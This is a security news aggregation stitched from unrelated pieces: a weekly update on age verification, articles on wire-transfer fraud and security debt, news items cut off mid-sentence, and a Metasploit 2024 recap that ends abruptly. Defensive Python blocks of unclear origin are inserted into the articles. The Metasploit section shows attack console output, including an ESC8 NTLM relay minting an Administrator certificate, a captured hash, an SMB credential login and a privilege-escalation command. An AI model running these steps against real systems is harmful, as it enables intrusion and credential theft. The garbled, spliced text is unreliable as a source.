Presently sponsored by: Report URI: Guarding you from rogue JavaScript! Don’t get pwned; get real-time alerts & prevent breaches #SecureYourSite

Weekly Update 433

It sounds easy - "just verify people's age before they access the service" - but whether we're talking about porn in the US or Australia's incoming social media laws, the reality is way more complex than that. There's no unified approach across jurisdictions and even within a single country like Australia, the closest we've got to that is a government scheme usually intended for accessing public services. And even if there was a technically workable model, who wants to get either the gov or some big tech firm involved in their use of Instagram or Pornhub?! There's a social acceptance to be considered and not only that, circumvention of age controls is very easy when you can simply VPN into another jurisdiction and access the same website blocked in your locale. Or in the case of the adult material, I'm told (🤷‍♂️) there are many other legally operating websites in other parts of the world that are less inclined to block individuals in specific states from foreign countries. There'll be no easy solutions for this one, but it'll make for an entertaining year 😊


References

  1. Sponsored by: Report URI: Guarding you from rogue JavaScript! Don’t get pwned; get real-time alerts & prevent breaches #SecureYourSite
  2. My trusty Synology DS1512+ finally died after 12 years of faithful service (since recording this video, the new DS923+ arrived and migration was super smooth)
  3. Pornhub addressed the age verification mandate from a bunch of US states by simply... blocking them (I wonder if there's a way around that...)
  4. Proton VPN has seen a "massive surge" in VPN signups from the US (...there we go 🙂)
  5. The EFF reckons there is no effective age verification method (they also downplay the negative impacts of social media on kids, which I disagree with)
  6. The Glamira data breach made it into HIBP (link through to a Reddit thread where the company acknowledged the breach last year, no word on whether they disclosed to impacted individuals)

Texas-based firm Orion recently fell victim to a significant wire transfer fraud scam, which ended up costing the business $60 million at the end of the day. While many may think such scams are rare, the FBI reports that bank wire transfer fraud is a multi-billion-dollar problem that last year alone saw 84% of businesses hit with fraud attempts. It’s time for companies to take necessary action to weed out scammers before they join the list of wire transfer fraud victims.

Some recent examples of those who have been successfully scammed include the following:

  • Toyota lost $37 million to a business email compromise (BEC) involving invoice fraud.
  • Tech company Ubiquiti was scammed out of $46 million through CEO impersonation.
  • Scouler Co. was hit with a $17.2 million acquisition scam via CEO impersonation.
  • Facebook and Google were scammed for over $100 million.

Preventing bank wire transfer fraud begins with an understanding of what it is. Bank wire transfer fraud occurs when a scammer convinces a business to send funds to a fraudulent account. At face value, it might seem like identifying a scammer would be far easier than defending against other threats, such as ransomware attacks. That view is misguided. These criminals employ sophisticated tactics and exhibit behavior that flies below the radar of current systems.

Here is how a typical wire transfer fraud plays out:

  1. A vendor’s mailbox is compromised, allowing an attacker to gain access to critical information that they can use to open additional accounts in the vendor’s name. On the surface, the accounts look legitimate, which is why they don’t raise a red flag with a business’s bank account validation solution. Scenarios like this shine a spotlight on why traditional validation processes are flawed.
  2. At this point, the attacker begins communicating with the business, generally via an existing email chain. These communications are not nefarious—quite the opposite. At this point, the scammer wants to establish credibility, not raise suspicion. This step can go on for an extended period.
  3. Once a sufficient level of trust has been established, the scammer requests a payment change, sends fraudulent invoices, and begins diverting funds to a new account. Some of these requests will communicate a sense of urgency, pressuring the victim to “think less” in favor of moving quickly.

Traditional email security tools like Secure Email Gateways (SEGs) and behavioral AI solutions, which most organizations rely on today, fall short in effectively detecting and preventing business wire transfer fraud, even when the attack comes from email. SEGs, for instance, focus on spotting threats with obvious signs of maliciousness, like phishing links. However, when fraudsters employ advanced social engineering tactics by crafting emails that appear genuine or even hijacking an employee’s email to interact normally, SEGs fail to raise any alarms. Similarly, behavioral AI tools struggle against these scams because fraudsters know how to dupe the models by exercising patience and being adept at blending in over time, mimicking normal activity until they’re ready to strike. This allows them to slip past these defenses undetected.

How to Combat Bank Wire Transfer Fraud

So, what options do companies have if SEG filters and behavioral AI can’t stop bank wire transfer fraud? Businesses need a holistic solution beyond email security and covering the entire payment process, including detecting unusual account changes and duplicate invoices in systems like ERPs.

Email-focused tools tend to overlook ERP systems, which have a much broader scope that includes an array of business processes and data types that go far beyond email. ERP systems are also very complex and email-focused tools tend to struggle to effectively monitor and secure all aspects of an ERP system.
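The three-step playbook above (compromised vendor mailbox, patient rapport, then a payment change or duplicate invoice) and the ERP checks this section calls for can be illustrated with a small payment-process control. The following is an added example written for this page, not code from the article or from any vendor it describes; vendor master data, invoices, account numbers and sender addresses are all constructed. It shows why an account-on-file comparison catches the case where the e-mail really does come from the vendor's own (compromised) mailbox, which a sender-domain check alone cannot.

```python
"""Added example, not code from the original article or its vendor: payment-process
checks of the kind the text says an ERP-aware control needs. All vendor records,
invoices and sender addresses below are constructed."""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class Vendor:
    vendor_id: str
    bank_account: str   # account on file, confirmed out of band when the vendor was onboarded
    email_domain: str   # domain the vendor's accounts-payable mail normally comes from


@dataclass
class Invoice:
    vendor_id: str
    invoice_no: str
    amount: float
    bank_account: str   # account the invoice asks to be paid into
    sender: str         # address the invoice e-mail arrived from
    body: str = ""


# Constructed vendor master data: the "account on file" a payment change is compared against.
VENDORS: Dict[str, Vendor] = {
    "V100": Vendor("V100", "GB29NWBK60161331926819", "acme-parts.example"),
}

URGENCY_WORDS = ("urgent", "immediately", "today", "asap", "before close of business")


def check_invoice(inv: Invoice, seen: Dict[str, Invoice]) -> List[str]:
    """Return finding codes for one invoice; `seen` holds previously accepted
    invoices keyed by 'vendor_id/invoice_no'."""
    vendor = VENDORS.get(inv.vendor_id)
    if vendor is None:
        return ["UNKNOWN_VENDOR"]
    findings: List[str] = []
    # Pay-to account differs from the account on file: the payment-change request of step 3.
    if inv.bank_account != vendor.bank_account:
        findings.append("ACCOUNT_CHANGE")
    key = f"{inv.vendor_id}/{inv.invoice_no}"
    if key in seen:
        findings.append("DUPLICATE_INVOICE")
    elif any(s.vendor_id == inv.vendor_id and abs(s.amount - inv.amount) < 0.01
             for s in seen.values()):
        findings.append("DUPLICATE_AMOUNT")
    # Sender domain is not the vendor's own: look-alike domains or free-mail accounts.
    sender_domain = inv.sender.rsplit("@", 1)[-1].lower()
    if sender_domain != vendor.email_domain:
        findings.append("SENDER_DOMAIN_MISMATCH")
    # Pressure language: "think less, move quickly".
    body = inv.body.lower()
    if any(w in body for w in URGENCY_WORDS):
        findings.append("URGENCY_LANGUAGE")
    return findings


def triage(invoices: List[Invoice]) -> List[Tuple[str, List[str]]]:
    """Run the checks over a batch in arrival order. Clean invoices are accepted
    into `seen`; flagged ones are held for out-of-band verification instead."""
    seen: Dict[str, Invoice] = {}
    report: List[Tuple[str, List[str]]] = []
    for inv in invoices:
        findings = check_invoice(inv, seen)
        report.append((f"{inv.vendor_id}/{inv.invoice_no}", findings))
        if not findings:
            seen[f"{inv.vendor_id}/{inv.invoice_no}"] = inv
    return report


# Constructed batch: one clean invoice, then the patterns described in the text.
SAMPLE_INVOICES = [
    Invoice("V100", "INV-1001", 12500.00, "GB29NWBK60161331926819",
            "ap@acme-parts.example", "Invoice attached, net 30."),
    # Sent from the vendor's real (compromised) mailbox, so the domain check passes;
    # only the account comparison and the urgency wording catch it.
    Invoice("V100", "INV-1002", 9800.00, "GB94BARC10201530093459",
            "ap@acme-parts.example", "Please note our new bank details. Payment must be made today."),
    Invoice("V100", "INV-1001", 12500.00, "GB29NWBK60161331926819",
            "ap@acme-parts.example", "Resending invoice."),
    Invoice("V100", "INV-1003", 4200.00, "GB29NWBK60161331926819",
            "billing@acme-parts-invoices.example", ""),
]

if __name__ == "__main__":
    for key, findings in triage(SAMPLE_INVOICES):
        print(key, findings or "ok")
```

The point of the design is that the account comparison is made against data the e-mail channel cannot influence: the vendor master record in the ERP. A finding of `ACCOUNT_CHANGE` should route to a call-back on a phone number already on file, never to a number supplied in the same e-mail thread.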

Stopping Fraud with AI

When it comes to stopping these scams, a team’s best weapon is AI. Today’s modern AI-based analysis systems excel where these other solutions fall short. That’s because they can monitor and assess every aspect of operations, scrutinize emails for changes in tone and writing style, identify suspicious links, and even delve into other people included in the thread. From there, the systems can generate real-time risk and trust scores, flag discrepancies or anomalies, send alerts for potentially fraudulent activities, and integrate smoothly into existing workflows for easy adoption.

These systems also provide a view of the third-party vendors that comprise your supply chain. This includes complete visibility into their management, the ability to track activities, control their permissions and system access, and enforce all key security protocols. This supply chain view is vital because these businesses that are so important to your day-to-day business are attractive targets for scammers because they often lack the same levels of security as larger enterprises, making them easy to exploit.

The high-profile cases of Toyota, Ubiquiti, and others should have most companies taking notice, as should the fact that more victims will join their ranks soon. Avoiding this dubious honor means reevaluating current strategies regarding bank wire transfer fraud. Most notably, stop counting on SEGs and behavioral AI solutions to weed out the scammers in favor of a new breed of AI-powered systems that span the entire payment process to stop the scammers dead in their tracks.

The post Shine the AI Light on Bank Wire Transfer Fraud appeared first on Cybersecurity Insiders.

It’s a common challenge for today’s security teams to find themselves stuck in a never-ending cycle of identifying, prioritizing, and mitigating vulnerabilities. Oftentimes, what goes overlooked during this perpetual process is security debt. Similar to technical debt, security debt is the increasing total of unresolved vulnerabilities within an organization’s software and systems. As more vulnerabilities are identified, and the higher risk ones are prioritized for remediation, the remaining list of vulnerabilities continues to grow. 

Through risk-based vulnerability management, the focus on remediating higher priority vulnerabilities sounds like a great idea. But wrapped up in the shadow of what you do fix, there is also a passive decision of what not to fix, which creates a large backlog of ‘lower’ risk vulnerabilities, which over time, can tax an organization’s resources. The standard process of discovery and response for vulnerabilities usually has organizations remediating two out of every 10 new vulnerabilities, while the remaining 80%, which pose less risk, but not none, are pushed back as the cycle repeats itself to address the latest batch of ‘critical’ vulnerabilities first. 

Security Debt’s Impact

When organizations repeatedly leave lower priority vulnerabilities unaddressed, it creates security debt, which can have a few negative effects: 

  • Increased Attack Surface: As more vulnerabilities are left exposed, over time those vulnerabilities can increase in risk, broadening the attack surface and allowing attackers to exploit weak points and infiltrate systems over the long term. 

  • Resource Drain: Managing ongoing security debt can be a drain on resources, as security teams are in a constant state of prioritizing and patching vulnerability after vulnerability, without being able to take any proactive steps to address the sheer volume of existing vulnerabilities, which continues to grow. Vulnerabilities are generally least expensive to fix when they are recent, so a long tail of deferred remediation pushes increasing costs into the future. 

  • Compliance Risks: Depending on the geography and industry of a business, compliance regulations may require a certain vulnerability remediation promptness. Security debt via unpatched vulnerabilities can lead to non-compliance, resulting in the loss of business, fines, legal repercussions, and damage to a brand’s reputation. 

  • Complex Remediation: The more security debt is accumulated, the more complex remediation becomes. This complexity only slows down the process further, including for addressing critical vulnerabilities. This decreases an organization’s resiliency to new threats. 

It’s critical for organizations to understand the adverse effects of security debt and its compounding nature. The more the list of unaddressed security vulnerabilities grows, the more risk, the more complexity, and the more cost involved in trying to get that security debt back down. 

Expedited vs. Efficient Remediation 

Risk-based vulnerability management is a strategy that emphasizes remediating the highest risk vulnerabilities right away. The focus of this remediation strategy is to fix the most urgent items first, thus described as ‘expedited’ remediation. While it remains critical to resolve vulnerabilities most likely to result in breaches, expedited remediation can’t be the only approach an organization takes to vulnerability management. 

This is where another approach called efficient remediation comes in. It’s an opportunity for security and IT teams to work together to alleviate security debt. Rather than focusing on individual items, this strategy involves looking at higher order patterns on where root cause analysis can be used to wipe away debt at the source. Additionally, this involves giving Dev and IT teams visibility into vulnerability scoring, and allowing them to evaluate the backlog of vulnerabilities that exist at their organization regularly during sprints or other development lifecycles. The most common example of this approach is “Patch Tuesday” where a single day every month eliminates a large percentage of vulnerabilities all in one go. But you can push the boundaries even further, and create high level strategies to eliminate entire groups of vulnerabilities at a time. A common next step is to group vulnerabilities by your technology stack and see which technologies are creating the most risk to your organization. You can leverage this to make business decisions about where your resources will be most effective at resolving risk. 
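To make the difference between the two approaches concrete, here is an added example (not code from the article) that runs both strategies over a constructed backlog. The vulnerability identifiers, CVSS scores, components and fix actions are invented for illustration; the "efficient" pass groups findings by the single root-cause action that closes them (the technology-stack grouping the text describes) and picks the actions that retire the most debt.

```python
"""Added example, not from the original article: 'expedited' (risk-ranked, one item
at a time) versus 'efficient' (root-cause grouped) remediation over a constructed
vulnerability backlog. Identifiers and scores are invented."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class Vuln:
    vuln_id: str      # constructed identifier, not a real CVE
    cvss: float
    component: str    # technology the finding belongs to
    fix: str          # the single action that closes it (upgrade, config change)
    age_days: int     # how long it has sat in the backlog


BACKLOG: List[Vuln] = [
    Vuln("VULN-001", 9.8, "openssl", "upgrade openssl 3.0.x", 3),
    Vuln("VULN-002", 5.3, "openssl", "upgrade openssl 3.0.x", 210),
    Vuln("VULN-003", 4.0, "openssl", "upgrade openssl 3.0.x", 340),
    Vuln("VULN-004", 8.1, "log4j", "upgrade log4j 2.x", 30),
    Vuln("VULN-005", 6.5, "jquery", "upgrade jquery 3.x", 400),
    Vuln("VULN-006", 5.0, "jquery", "upgrade jquery 3.x", 380),
    Vuln("VULN-007", 4.3, "jquery", "upgrade jquery 3.x", 370),
    Vuln("VULN-008", 3.7, "jquery", "upgrade jquery 3.x", 365),
    Vuln("VULN-009", 7.2, "nginx", "upgrade nginx 1.26", 12),
    Vuln("VULN-010", 2.0, "tls-config", "disable TLS 1.0/1.1", 500),
]


def expedited(backlog: List[Vuln], capacity: int) -> Tuple[List[str], List[str]]:
    """Risk-based pass: fix the `capacity` highest-CVSS items; everything else is debt."""
    ranked = sorted(backlog, key=lambda v: v.cvss, reverse=True)
    return [v.vuln_id for v in ranked[:capacity]], [v.vuln_id for v in ranked[capacity:]]


def by_fix_action(backlog: List[Vuln]) -> Dict[str, List[Vuln]]:
    """Group findings by the root-cause action that closes them."""
    groups: Dict[str, List[Vuln]] = defaultdict(list)
    for v in backlog:
        groups[v.fix].append(v)
    return dict(groups)


def efficient(backlog: List[Vuln], capacity: int) -> Tuple[List[str], List[str]]:
    """Efficient pass: choose the `capacity` fix actions that close the most findings
    (ties broken by the highest CVSS inside the group) and list what they retire."""
    groups = by_fix_action(backlog)
    ranked = sorted(groups.items(),
                    key=lambda kv: (len(kv[1]), max(v.cvss for v in kv[1])),
                    reverse=True)
    chosen = ranked[:capacity]
    closed = [v.vuln_id for _, vs in chosen for v in vs]
    return [fix for fix, _ in chosen], closed


def debt_summary(backlog: List[Vuln], remaining_ids: Set[str]) -> Dict[str, int]:
    """Size and age of what is left: older items are the costlier end of the tail."""
    left = [v for v in backlog if v.vuln_id in remaining_ids]
    ages = sorted(v.age_days for v in left)
    median = ages[len(ages) // 2] if ages else 0
    return {"remaining": len(left), "median_age_days": median}


if __name__ == "__main__":
    fixed, remaining = expedited(BACKLOG, 2)
    print("expedited fixes", fixed, debt_summary(BACKLOG, set(remaining)))
    fixes, closed = efficient(BACKLOG, 2)
    print("efficient actions", fixes, "close", len(closed), "findings")
```

With the same budget of two work items, the expedited pass retires two findings and leaves eight; the efficient pass retires seven by choosing two upgrades, and still closes the 9.8-scored item because it belongs to one of those groups. In practice both passes run: the expedited list protects against the item that cannot wait for a sprint, the grouped view is what the Dev and IT teams plan their sprint around.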

Solving Security Debt

As businesses uncover new vulnerabilities, security debt will grow, impacting the ability to defend against attacks and keep data secure. While risk-based vulnerability management will make sure the most critical risks are addressed right away, efficient remediation must be done in tandem. Together, security, IT, and Engineering teams working side-by-side can remediate more total vulnerabilities, reducing security debt and their organization’s potential exposure to attacks. 


The post The Impact of Risk-Based Vulnerability Management on Security Debt appeared first on Cybersecurity Insiders.

A high-severity security flaw has been disclosed in ProjectDiscovery's Nuclei, a widely-used open-source vulnerability scanner that, if successfully exploited, could allow attackers to bypass signature checks and potentially execute malicious code. Tracked as CVE-2024-43405, it carries a CVSS score of 7.4 out of a maximum of 10.0. It impacts all versions of Nuclei later than 3.0.0. "The
Cybersecurity researchers have flagged a new malware called PLAYFULGHOST that comes with a wide range of information-gathering features like keylogging, screen capture, audio capture, remote shell, and file transfer/execution. The backdoor, according to Google's Managed Defense team, shares functional overlaps with a known remote administration tool referred to as Gh0st RAT, which had its source
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Friday issued sanctions against a Beijing-based cybersecurity company known as Integrity Technology Group, Incorporated for orchestrating several cyber attacks against U.S. victims. These attacks have been publicly attributed to a Chinese state-sponsored threat actor tracked as Flax Typhoon (aka Ethereal Panda or
Metasploit 2024 Annual Wrap-Up

Another year has come and gone, and the Metasploit team has taken some time to review the year’s notable additions. This year saw some great new features added, Metasploit 6.4 released and a slew of new modules. We’re grateful to the community members new and old that have submitted modules and issues this year. The real privilege escalation was the privilege of working with the contributors and friends we made along the way. And so, as is tradition, let us begin the 2024 annual recap.

HTTP Relaying and ESC8

Metasploit continues to expand support for Active Directory Certificate Services (AD CS) attacks, also known as ESC attacks. These attacks have been popular since they were announced three years ago, and the complexity and ubiquity of enterprise AD CS setups has rendered them “gifts that keep on giving” for attackers and pen testers alike. This year, we added support for ESC8, a vulnerability in the AD CS Web Enrollment service, in which authentication from a user’s SMB connection can be relayed to a Certificate Web Enrollment endpoint and used to generate a valid certificate for authentication. This means that if an attacker can coerce a user to attempt to access an SMB share, their authentication can be relayed to a certificate server for authentication. Once authenticated, the session will allow the attacker to mint certificates for any template they have permissions to access. Unlike many AD CS attacks, this is not necessarily due to a misconfiguration in a template, but is an effect of the Web Enrollment service’s use of NTLM over HTTP, which does not enable relaying protections by default.

msf6 auxiliary(server/relay/esc8) > show options

Module options (auxiliary/server/relay/esc8):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   CAINPWFILE                      no        Name of file to store Cain&Abel hashes in. Only supports NTLMv1 hashes. Can be a path.
   JOHNPWFILE                      no        Name of file to store JohnTheRipper hashes in. Supports NTLMv1 and NTLMv2 hashes, each
                                              of which is stored in separate files. Can also be a path.
   MODE           AUTO             yes       The issue mode. (Accepted: ALL, AUTO, QUERY_ONLY, SPECIFIC_TEMPLATE)
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RELAY_TARGETS                   yes       Target address range or CIDR identifier to relay to
   RELAY_TIMEOUT  25               yes       Seconds that the relay socket will wait for a response after the client has initiated
                                             communication.
   RPORT          80               yes       The target port (TCP)
   SMBDomain      WORKGROUP        yes       The domain name used during SMB exchange.
   SRVHOST        0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local
                                              machine or 0.0.0.0 to listen on all addresses.
   SRVPORT        445              yes       The local port to listen on.
   SRV_TIMEOUT    25               yes       Seconds that the server socket will wait for a response after the client has initiated
                                              communication.
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /certsrv/        yes       The URI for the cert server.
   VHOST                           no        HTTP server virtual host


   When MODE is SPECIFIC_TEMPLATE:

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   CERT_TEMPLATE                   no        The template to issue if MODE is SPECIFIC_TEMPLATE.


Auxiliary action:

   Name   Description
   ----   -----------
   Relay  Run SMB ESC8 relay server



View the full module info with the info, or info -d command.

msf6 auxiliary(server/relay/esc8) > set RELAY_TARGETS 10.5.132.182
RELAY_TARGETS => 10.5.132.182
msf6 auxiliary(server/relay/esc8) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/relay/esc8) > 
[*] SMB Server is running. Listening on 0.0.0.0:445
[*] Server started.
[*] New request from 10.5.132.191
[*] Received request for EXAMPLE\Administrator
[*] Relaying to next target http://10.5.132.182:80/certsrv/
[+] Identity: EXAMPLE\Administrator - Successfully authenticated against relay target http://10.5.132.182:80/certsrv/
[SMB] NTLMv2-SSP Client     : 10.5.132.182
[SMB] NTLMv2-SSP Username   : EXAMPLE\Administrator
[SMB] NTLMv2-SSP Hash       : Administrator::EXAMPLE:9a0ad3b11b1b3471:b97c9d53262316974c31219cd6dd2f00:[…]

[+] Certificate generated using template User and EXAMPLE\Administrator
[+] Certificate for EXAMPLE\Administrator using template User saved to /home/tmoose/.msf4/loot/20241220141352_default_10.5.132.182_windows.ad.cs_360378.pfx
[*] Received request for EXAMPLE\Administrator
[*] Identity: EXAMPLE\Administrator - All targets relayed to
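From the defender's side, the relay above leaves a recognisable trace on the enrollment host: a network logon (event 4624, logon type 3) authenticated with NTLM, where the workstation name carried inside the NTLM AUTHENTICATE message is the victim's machine but the TCP source address is the relaying host. The following is an added example, not part of the Metasploit post or the framework, that applies that heuristic to constructed 4624 events; the host inventory, addresses and event records are all invented, with addresses chosen to resemble the session above.

```python
"""Added example, not part of the Metasploit post: a defender-side heuristic for
relayed NTLM logons in Windows Security 4624 events from an AD CS web enrollment host.
The host inventory and the events are constructed."""
from typing import Dict, List, Optional, Tuple

# Constructed inventory: workstation name -> address it is known to use (from DHCP/DNS).
INVENTORY: Dict[str, str] = {
    "WS-FINANCE01": "10.5.132.191",
    "WS-ENG07": "10.5.132.205",
    "CA01": "10.5.132.182",
}

# Constructed 4624 events; field names follow the Windows Security event schema.
EVENTS: List[Dict[str, str]] = [
    {"EventID": "4624", "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "TargetDomainName": "EXAMPLE", "TargetUserName": "Administrator",
     "WorkstationName": "WS-FINANCE01", "IpAddress": "10.5.132.191"},   # genuine logon
    {"EventID": "4624", "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "TargetDomainName": "EXAMPLE", "TargetUserName": "Administrator",
     "WorkstationName": "WS-FINANCE01", "IpAddress": "10.5.132.50"},    # name/address mismatch
    {"EventID": "4624", "LogonType": "3", "AuthenticationPackageName": "Kerberos",
     "TargetDomainName": "EXAMPLE", "TargetUserName": "jdoe",
     "WorkstationName": "WS-ENG07", "IpAddress": "10.5.132.205"},       # Kerberos, out of scope
    {"EventID": "4624", "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "TargetDomainName": "EXAMPLE", "TargetUserName": "svc-backup",
     "WorkstationName": "UNKNOWN-PC", "IpAddress": "10.5.132.50"},      # not in inventory
]


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a finding label for one 4624 event, or None if it looks ordinary."""
    if event.get("EventID") != "4624" or event.get("LogonType") != "3":
        return None
    if event.get("AuthenticationPackageName") != "NTLM":
        return None  # only NTLM is relayed this way; Kerberos logons are out of scope here
    name = event.get("WorkstationName", "").upper()
    ip = event.get("IpAddress", "")
    expected = INVENTORY.get(name)
    if expected is None:
        return "NTLM_FROM_UNINVENTORIED_WORKSTATION"
    if expected != ip:
        # The workstation name travels inside the NTLM AUTHENTICATE message, so a relay
        # preserves the victim's name while the TCP source is the relaying host.
        return "NTLM_WORKSTATION_IP_MISMATCH"
    return None


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, str, str, str]]:
    """Run classify over a batch; return (user, workstation, source address, label) for hits."""
    hits: List[Tuple[str, str, str, str]] = []
    for ev in events:
        label = classify(ev)
        if label:
            user = f"{ev['TargetDomainName']}\\{ev['TargetUserName']}"
            hits.append((user, ev["WorkstationName"], ev["IpAddress"], label))
    return hits


if __name__ == "__main__":
    for hit in scan(EVENTS):
        print(*hit)
```

The check is only as good as the inventory behind it: DHCP churn, VPN pools and multi-homed hosts all produce mismatches that are not relays, so it is a triage signal rather than a verdict. The structural fix is the one the paragraph above points at: the enrollment endpoint accepting NTLM over plain HTTP without relay protections, which is addressed by requiring HTTPS with Extended Protection for Authentication on the Web Enrollment site, or by disabling NTLM there altogether.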

Meterpreter’s PoolParty

In November 2024, the Metasploit Framework improved the Windows Meterpreter capabilities by including the PoolParty Injection technique to perform code injection into remote processes. The new technique functions as a replacement to the common kernel32!CreateRemoteThread technique. This increased the stealth skills of the Meterpreter agent without removing any functionality already present. Significant effort was made to implement the cleanest injection technique in a transparent manner to the user and avoid leaving any footprint in memory after a successful injection. Currently the PoolParty injection is based on the TP_DIRECT_INSERTION variant and supports code injection on 64-bit Windows 10 and newer systems. Injection to and from WoW64 processes is partially implemented due to some security restrictions. Injection is currently limited to WoW64 to x64.

LDAP Improvements

Over the past couple of years Metasploit has improved its LDAP support substantially. There are troves of data points available in Active Directory via LDAP that aid in various attack workflows. Some examples include the domain SID, the number of computers a normal user can add, kerberoastable accounts, vulnerable ESC templates and more. To aid users in accessing this information, Metasploit has continued to make LDAP improvements this year.

Metasploit 6.4 included multiple new protocol-based session types, one of which was LDAP. The ldap_login module can be used to open an interactive LDAP session, enabling the user to take multiple actions without needing to reconnect and reauthenticate to the target server. This feature is currently disabled by default, but can be enabled using set ldap_session_type true and then restarting Metasploit. Once established, these sessions can be used to run queries from the command line, or certain auxiliary modules, such as ldap_query and ldap_esc_vulnerable_cert_finder can use the session to gather information.

In addition to the new session type, Metasploit has added support for both channel binding and signing to enable users to operate in hardened environments. Now when Metasploit authenticates to an LDAP service, it’ll automatically use signing or channel binding as applicable based on the configuration. Signing can also be controlled using the LDAP::Signing datastore option which supports three values:

  • disabled – never use signing, useful for verifying a server is requiring signing
  • auto – signing will be used when it is necessary
  • required – signing will always be used

Channel binding is always used when SSL is in use. Metasploit supports channel binding for both NTLM and Kerberos authentication.

Metasploit 6.4 Released

This year Metasploit 6.4 was released with multiple features, including the new dns command, which grants the user a high degree of control over how DNS queries should be processed, and support for multiple new session types (PostgreSQL, MSSQL, MySQL and SMB) with the CreateSession option:

msf6 > use scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > run rhost=192.168.123.133 username=vagrant password=vagrant CreateSession=true

[*] 192.168.123.133:445   - 192.168.123.133:445 - Starting SMB login bruteforce
[+] 192.168.123.133:445   - 192.168.123.133:445 - Success: '.\vagrant:vagrant' Administrator
[*] SMB session 2 opened (192.168.123.1:52253 -> 192.168.123.133:445) at 2024-03-19 12:07:15 +0000

Each new session type supports different capabilities such as querying databases, using the SQL/SMB session with exploit modules to gain native sessions, and exploring and manipulating remote file systems:

msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
[*] Starting interaction with 1…
SMB (192.168.123.133) > ls
[-] No active share selected. Use the shares command to view available shares, and shares -i <id> to interact with one
SMB (192.168.123.133) > shares
Shares
======
    #  Name      Type          comment
    -  ----      ----          -------
    0  ADMIN$    DISK|SPECIAL  Remote Admin
    1  C$        DISK|SPECIAL  Default share
    2  foo       DISK
    3  IPC$      IPC|SPECIAL   Remote IPC
    4  NETLOGON  DISK          Logon server share
    5  SYSVOL    DISK          Logon server share

SMB (192.168.123.133) >

Metasploit 6.4 also continued to enhance support for Kerberos workflows.

Module Highlights

CVE-2023-22527
Metasploit had a great start to 2024 with the addition of a module for CVE-2023-22527 in January, which was an unauthenticated RCE in Atlassian Confluence. This module was written by Metasploit’s Spencer McIntyre aka zeroSteiner. Due to an SSTI flaw that allows an OGNL expression to be evaluated, Metasploit users can obtain OS command execution in the context of the service account. On Windows the service account is NT AUTHORITY\NETWORK SERVICE which, don’t forget, can easily be escalated to NT AUTHORITY\SYSTEM using the RPCSS named pipe impersonation technique in Meterpreter, just type: “getsystem -t 4”!

CVE-2024-21893 + CVE-2024-21887
February kept the good times rolling with an exploit chain that works against both Ivanti Connect Secure and Ivanti Policy Secure from Rapid7’s research extraordinaire, Stephen Fewer. This module combined CVE-2024-21893, an SSRF vulnerability, with a command injection vulnerability tracked as CVE-2024-21887 in order to achieve unauthenticated remote code execution in the context of the root user.

Shadow Credentials
The Shadow Credentials module was an incredible addition to Metasploit’s Active Directory exploit capabilities. Using an account that has write permissions over another user account object, the module adds a public key credential object to the user account's msDS-KeyCredentialLink property, and then uses the existing PKINIT functionality in the get_ticket module to authenticate as that user. This module was written by Metasploit aficionado Ashley Donaldson aka smashery.

CVE-2024-3400
April saw some amazing additions to the Metasploit Framework including a very impactful exploit module for CVE-2024-3400. PAN-OS GlobalProtect Gateway and GlobalProtect Portal deployments with the default telemetry service enabled could be remotely exploited without authentication in order to gain code execution in the context of the root user. Rapid7’s very own Ryan Emmons PR’d this module and it was the only module this year to be awarded the “hotness” label on GitHub, very cool.

CVE-2023-43177
This module, while being a great addition to the framework, also highlighted some great Rapid7 collaboration: the vulnerability was originally discovered by Rapid7’s Ryan Emmons and was written by the one and only Christophe De La Fuente. The exploit module leverages an Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability (CVE-2023-43177) to achieve unauthenticated remote code execution in the context of the Administrator user on Windows and the root user on Linux.

Progress Loadmaster sudo abuse privilege escalation
In May we saw the exploitation of Progress (Kemp) LoadMaster. The vulnerability lies in a configuration that allows sudo to auto-elevate when run with certain files, while granting the non-root user bal write permissions to those files. The exploit module simply overwrites one of the files that auto-elevates with /bin/bash and runs a payload within a root-enabled /bin/bash session. This heavy-hitting privilege escalation module was brought to us by Metasploit powerhouse Brendan Watters on the 10th of May.

CVE-2024-29824
July brought some of the hottest weather to the northern hemisphere; it also brought some of the hottest vulns to the Metasploit Framework with the addition of yet another fantastic exploit module from Christophe De La Fuente: the Ivanti Endpoint Manager (EPM) SQLi to RCE module. This exploit works by sending a SOAP envelope to the application targeting one poor unsanitized database parameter, which pays the ultimate price of allowing the query to be escaped and EXEC xp_cmdshell to be run. The SQLi allows for RCE in the context of the NT Service\MSSQL$LDMSDATA user.

CVE-2024-6670
While Progress WhatsUp Gold made headlines with CVE-2024-6670, community contributor h4x-x0r made haste writing an exploit module adding yet another high impact exploit module in their rookie year of Metasploit framework contributions. The vulnerability allows an unauthenticated attacker to change the password of an existing user to an attacker-controlled value potentially giving up administrative control over the application.

CVE-2024-43917
Some kids got tricks on Halloween but Metasploit got a treat - an exploit module for a SQLi in TI WooCommerce Wishlist. Submitted by one of the hardest working Metasploit community members Valentin Lobstein aka Chocapikk, this was only one of 10 WordPress plugin modules they contributed this year. We decided to highlight this particular module because with it came an entire library of SQLi functionality specifically designed to help facilitate SQLi exploitation against WordPress plugins. We love seeing this type of reusability being added to the framework.

CVE-2024-35230
They say when it rains it pours and this is all too true when looking at the amount of vulnerabilities discovered in the Windows Kernel Streaming family of drivers this year. This module, written by Metasploit’s Jack Heysel, targeted an Access Mode Mismatch LPE in ks.sys. The vulnerable driver had hardcoded the RequestorMode parameter of a KTHREAD structure to KernelMode, which eventually allows for user supplied code to be executed with SYSTEM level privileges. This bug can be found lurking in the depths of Windows 2008 SP2 all the way up to present day Windows 11 and Server 2022.

CVE-2024-27596
